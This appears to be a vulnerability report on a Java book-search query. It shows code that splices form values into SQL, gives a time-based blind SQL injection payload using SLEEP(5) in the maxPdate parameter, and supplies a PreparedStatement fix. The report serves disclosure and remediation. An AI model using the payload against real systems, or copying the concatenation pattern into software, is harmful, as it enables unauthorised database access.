Open
Description
Code that generates the SQL injection (every user-controlled value is concatenated straight into the query text):

```java
String baseSql = "from book where price>=" + minprice; // if the form leaves minprice empty, the exception handler sets minprice=0
String sql = baseSql;
if (maxprice != 0) sql = baseSql + " and price<=" + maxprice; // maxprice supplied by the form
if (!minpdate.equals("")) sql += " and pdate>= '" + minpdate + "'";
if (!maxpdate.equals("")) sql += " and pdate<= '" + maxpdate + "'";
if (cateId != 0) sql += " and cateId=" + cateId;
if (!name.equals("")) {
    String keywords = "";
    for (int i = 0; i < name.length(); i++) // split the keyword into single characters for a fuzzy match
        keywords += "%" + name.charAt(i);
    sql += " and name like " + "'" + keywords + "%'";
}
String countSql = "select count(*) " + sql; // count the rows matching the filter
sql = "select * " + sql + " limit ?,?";
System.out.println(sql);
System.out.println(countSql);
```
Payload:

```
type=search&bookname=aaaaa&cateId=0&minprice=&maxprice=&minPdate=&maxPdate=2024-04-15' AND (SELECT 5405 FROM (SELECT(SLEEP(5)))ITKj) AND 'GJzT'='GJzT
```
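The root cause is that `minpdate`, `maxpdate` and the per-character `like` pattern are spliced into the SQL string, so a single quote in `maxPdate` closes the literal and the rest of the value becomes SQL. The fix is to keep the same filter logic but emit `?` placeholders and bind each value with `PreparedStatement`, which the snippet already does for the `limit` arguments only. The following is an added example written for this issue, not code from the project; the `SafeBookSearch` class, the `Query` holder and the parameter names are assumptions, and the `book` table and column names are taken from the reported snippet.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

/** Same book search as the vulnerable snippet, but every value is a bound parameter. */
public class SafeBookSearch {

    /** SQL text containing only '?' placeholders plus the values to bind, in order. */
    static final class Query {
        final String sql;
        final List<Object> params;
        Query(String sql, List<Object> params) { this.sql = sql; this.params = params; }
    }

    /**
     * Builds either the count query or the paged select. Conditions are appended
     * exactly as in the original code, but user input never touches the SQL text.
     */
    static Query build(double minprice, double maxprice, String minpdate, String maxpdate,
                       int cateId, String name, int offset, int pageSize, boolean count) {
        StringBuilder where = new StringBuilder("from book where price >= ?");
        List<Object> params = new ArrayList<>();
        params.add(minprice);
        if (maxprice != 0) { where.append(" and price <= ?"); params.add(maxprice); }
        if (minpdate != null && !minpdate.isEmpty()) { where.append(" and pdate >= ?"); params.add(minpdate); }
        if (maxpdate != null && !maxpdate.isEmpty()) { where.append(" and pdate <= ?"); params.add(maxpdate); }
        if (cateId != 0) { where.append(" and cateId = ?"); params.add(cateId); }
        if (name != null && !name.isEmpty()) {
            // Same per-character fuzzy pattern; as a bound value, quotes inside it are inert.
            StringBuilder keywords = new StringBuilder();
            for (int i = 0; i < name.length(); i++) keywords.append('%').append(name.charAt(i));
            keywords.append('%');
            where.append(" and name like ?");
            params.add(keywords.toString());
        }
        if (count) return new Query("select count(*) " + where, params);
        where.append(" limit ?, ?");
        params.add(offset);
        params.add(pageSize);
        return new Query("select * " + where, params);
    }

    /** Binds the collected values 1-based, as JDBC expects. */
    static PreparedStatement prepare(Connection conn, Query q) throws SQLException {
        PreparedStatement ps = conn.prepareStatement(q.sql);
        for (int i = 0; i < q.params.size(); i++) ps.setObject(i + 1, q.params.get(i));
        return ps;
    }

    public static void main(String[] args) {
        // Constructed input: the maxPdate value from the reported payload, passed as plain data.
        String maxPdate = "2024-04-15' AND (SELECT 5405 FROM (SELECT(SLEEP(5)))ITKj) AND 'GJzT'='GJzT";
        Query q = build(0, 0, "", maxPdate, 0, "aaaaa", 0, 10, false);
        // The SQL text contains no user data; the whole payload string is just the 2nd parameter value.
        System.out.println(q.sql);
        System.out.println(q.params);
    }
}
```

Running `main` prints `select * from book where price >= ? and pdate <= ? and name like ? limit ?, ?` followed by the parameter list, so the quote and the `SLEEP(5)` subquery are compared against the `pdate` column as a literal string rather than executed. Two points remain outside the injection fix: `%` and `_` typed into `bookname` still act as LIKE wildcards (the original code intends wildcard matching, so this is unchanged), and the `System.out.println` calls that echoed the assembled SQL should not ship in production since they reveal the query shape.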